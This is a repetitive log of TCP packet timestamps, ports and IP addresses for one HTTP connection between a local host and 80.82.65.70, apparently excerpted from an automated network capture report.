                                        Dec 12, 2024 23:09:06.171699047 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.171745062 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.173492908 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.173537970 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.173547029 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.173587084 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.175470114 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.175522089 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.175556898 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.175601959 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.177345991 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.177416086 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.177463055 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.177510023 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.179244995 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.179305077 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.179351091 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.179389954 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.181078911 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.181124926 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.181163073 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.181202888 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.182904005 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.182948112 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.183028936 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.183068037 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.184731007 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.184784889 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.184823036 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.184859991 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.186527014 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.186588049 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.186614037 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.186659098 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.188270092 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.188318014 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.188365936 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.188409090 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.190002918 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.190068960 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.190092087 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.190129995 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.218344927 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.218471050 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.218575001 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.218636990 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.218790054 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.218844891 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.218844891 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.218888044 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.219655991 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.219703913 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.219794035 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.219839096 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.220473051 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.220520020 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.220601082 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.220647097 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.221287012 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.221335888 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.221411943 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.221462011 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.222178936 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.222203970 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.222234964 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.222254992 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.223006010 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.223061085 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.223119020 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.223167896 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.223860025 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.223907948 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.224173069 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.224225044 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.224718094 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.224776030 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.224832058 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.224885941 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.225620031 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.225789070 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.225826979 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.225873947 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.226439953 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.226494074 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.226572990 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.226628065 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.227390051 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.227440119 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.227618933 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.227664948 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.228174925 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.228225946 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.228291035 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.228338003 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.229020119 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.229069948 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.229084015 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.229125977 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.229907036 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.230055094 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.230082035 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.230128050 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.230748892 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.230803013 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.230823994 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.230866909 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.231623888 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.231683016 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.231688976 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.231734991 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.232548952 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.232597113 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.232714891 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.232760906 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.233303070 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.233350039 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.233386040 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.233434916 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.234162092 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.234213114 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.234316111 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.234360933 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.235044956 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.235095024 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.235110998 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.235151052 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.235913992 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.235965014 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.236012936 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.236057997 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.236767054 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.236816883 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.236840963 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.236892939 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.237602949 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.237647057 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.237679958 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.237720966 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.238436937 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.238503933 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.238539934 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.238594055 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.239275932 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.239339113 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.239373922 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.239424944 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.240210056 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.240261078 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.240294933 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.240345001 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.332458019 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.332539082 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.332576990 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.332623959 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.332921028 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.332973003 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.333009958 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.333055019 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.333643913 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.333694935 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.333848953 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.333901882 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.334512949 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.334566116 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.334670067 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.334719896 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.335505962 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.335558891 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.335567951 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.335612059 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.336266994 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.336333036 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.336388111 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.336457968 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.337083101 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.337146997 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.337205887 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.337255001 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.337908983 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.337973118 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.338010073 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.338056087 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.338752985 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.338809967 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.338876009 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.338928938 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.339620113 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.339668989 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.339699030 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.339746952 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.340486050 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.340538979 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.340614080 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.340667963 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.341453075 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.341509104 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.341547966 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.341610909 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.342287064 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.342348099 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.342380047 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.342428923 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.343060970 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.343122005 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.343162060 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.343219042 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.343914986 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.343981981 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.344134092 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.344187021 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.344785929 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.344842911 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.344882011 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.344928980 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.345653057 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.345700979 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.345776081 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.345829010 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.346517086 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.346577883 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.346582890 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.346630096 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.347444057 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.347495079 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.347521067 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.347568989 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.348236084 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.348280907 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.348280907 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.348335981 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.349087954 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.349133968 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.349244118 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.349289894 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.349920988 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.349968910 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.350119114 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.350167990 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.350863934 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.350905895 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.350940943 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.350980997 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.351727962 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.351774931 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.351845980 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.351887941 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.352513075 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.352576017 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.352606058 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.352648973 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.353400946 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.353458881 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.353476048 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.353528023 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.354222059 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.354274988 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.354331017 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.354372025 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.410295963 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.410367966 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.410453081 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.410491943 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.410625935 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.410671949 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.410842896 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.410890102 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.411575079 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.411623955 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.411798000 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.411840916 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.411920071 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.412198067 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.412647009 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.412691116 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.412806034 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.412852049 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.413511992 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.413558960 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.413641930 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.413687944 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.414441109 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.414486885 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.414597988 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.414645910 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.415260077 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.415302992 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.415339947 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.415379047 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.416069031 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.416106939 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.416186094 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.416232109 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.416929007 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.416964054 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.417082071 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.417119026 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.417798042 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.417839050 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.417867899 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.417901993 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.418668032 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.418711901 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.418819904 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.418864012 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.419517040 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.419559956 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.419581890 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.419615030 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.420375109 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.420433998 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.420506954 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.420548916 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.421232939 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.421286106 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.421324968 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.421361923 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.422066927 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.422111034 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.422144890 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.422189951 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.422976017 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.423015118 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.423122883 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.423160076 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.423769951 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.423808098 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.423871994 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.423912048 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.424662113 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.424707890 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.424858093 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.424900055 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.425524950 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.425570011 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.425617933 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.425652981 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.426422119 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.426462889 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.426491022 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.426544905 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.427268982 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.427301884 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.427361012 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.427407980 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.428143978 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.428189993 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.428196907 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.428232908 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.429009914 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.429052114 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.429084063 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.429119110 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.429820061 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.429863930 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.429940939 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:06.429982901 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:06.430677891 CET804974480.82.65.70192.168.2.4
